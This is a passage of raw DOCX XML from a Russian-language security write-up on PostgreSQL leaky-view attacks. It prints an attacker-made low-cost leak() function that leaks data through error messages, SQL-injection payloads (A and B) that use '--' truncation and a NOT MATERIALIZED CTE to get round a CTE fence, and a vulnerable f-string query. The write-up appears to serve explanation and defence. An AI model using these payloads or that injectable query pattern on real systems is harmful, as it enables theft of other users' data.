        </w:rPr>
        <w:t xml:space="preserve">REVOKE ALL ON orders FROM app_user;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Leaky-функция: атакующая (он же атакующий создаёт)</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leak(t text, guess text) RETURNS boolean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IF t LIKE guess || '%'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'leak-match: %', t;</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RETURN false;</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 LANGUAGE plpgsql COST 0.0001;  -- exceptionally low cost для pushdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Function </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leak(t, guess)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cost=0.0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — планировщик считает её крайне дешёвой и пушит до более дорогих фильтров. Внутри — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с pattern-match: при совпадении RAISE EXCEPTION с leaked-данными в message → 3.2 (error-based) канал.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для атак, где CREATE FUNCTION недоступен: используется встроенный оператор с известным leak-поведением — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lower(secret_col) ~ 'guess.*'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (regex matching против атакующего pattern) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">secret_col::int / 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (deliberate error если match) — оба работают как leaky-операторы, оба cost-низкие.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — прямой leak без CTE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Baseline-payload, не использующий CTE. Демонстрирует leaky-view-проблему «как есть»:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id IS NOT NULL AND leak(internal_notes, 'secret_pre')</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customer_name, total FROM orders_visible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id IS NOT NULL AND leak(internal_notes, 'secret_pre')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Поведение PG 12+ при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">security_barrier=off</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1. Планировщик inline-разворачивает view: запрос становится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, customer_name, total FROM orders WHERE customer_id = current_setting(...) AND leak(internal_notes, 'secret_pre')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2. По стоимости: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leak()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cost=0.0001 (низшая), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_setting(...)::int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cost ≈ 0.1 (вызов setting), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">customer_id = X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cost ≈ 0.0025 (integer comparison через btree).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Планировщик пушит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`leak()` первым</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — на каждой строке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">orders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (включая чужие строки!).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leak()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сравнивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">internal_notes</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'secret_pre%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если совпало, RAISE EXCEPTION с leaked-данными в message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий получает leak строк </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">orders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, к которым у него нет прямого SELECT-доступа. Бинарный поиск по pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'secret_pre_a'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'secret_pre_b'</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'secret_pre_'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — символ за символом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — попытка app-защиты через WITH + обход через NOT MATERIALIZED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: разработчик попытался защититься, обернув view-запрос в CTE с расчётом на «CTE = optimization fence». В коде:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/orders.py — попытка защиты</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = text(f"WITH safe AS (SELECT * FROM orders_visible) SELECT id, customer_name, total FROM safe WHERE {where_clause}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Разработчик ожидает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH safe AS (SELECT * FROM orders_visible)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> материализуется (потому что в PG ≤ 11 это было так), и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leak()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполнится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> view-фильтра. На PG 12+ CTE inlined — защита не работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий явно блокирует возможный future-fix через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-keyword:</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where_clause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true AND leak(internal_notes, 'secret_pre') -- (плюс затирание оставшегося SQL через --)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь CTE-обёртка уже в коде; атакующий просто добавляет leaky-предикат во внешний WHERE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработчик потом «починит» через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH safe AS MATERIALIZED (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, атакующий контр-атакует другим payload — внедряя свой CTE-блок:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">true AND id IN (WITH attacker AS NOT MATERIALIZED (SELECT id FROM orders_visible WHERE leak(internal_notes, 'secret_pre')) SELECT id FROM attacker)</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WITH safe AS MATERIALIZED (SELECT * FROM orders_visible)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, customer_name, total FROM safe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE true AND id IN (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH attacker AS NOT MATERIALIZED (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT id FROM orders_visible WHERE leak(internal_notes, 'secret_pre')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id FROM attacker</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Внутренний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH attacker AS NOT MATERIALIZED (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> форсирует inline (даже на PG 12+ это explicit), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">leak()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> снова пушится через view → leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — обход security_barrier через `LEAKPROOF`-функцию атакующего</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
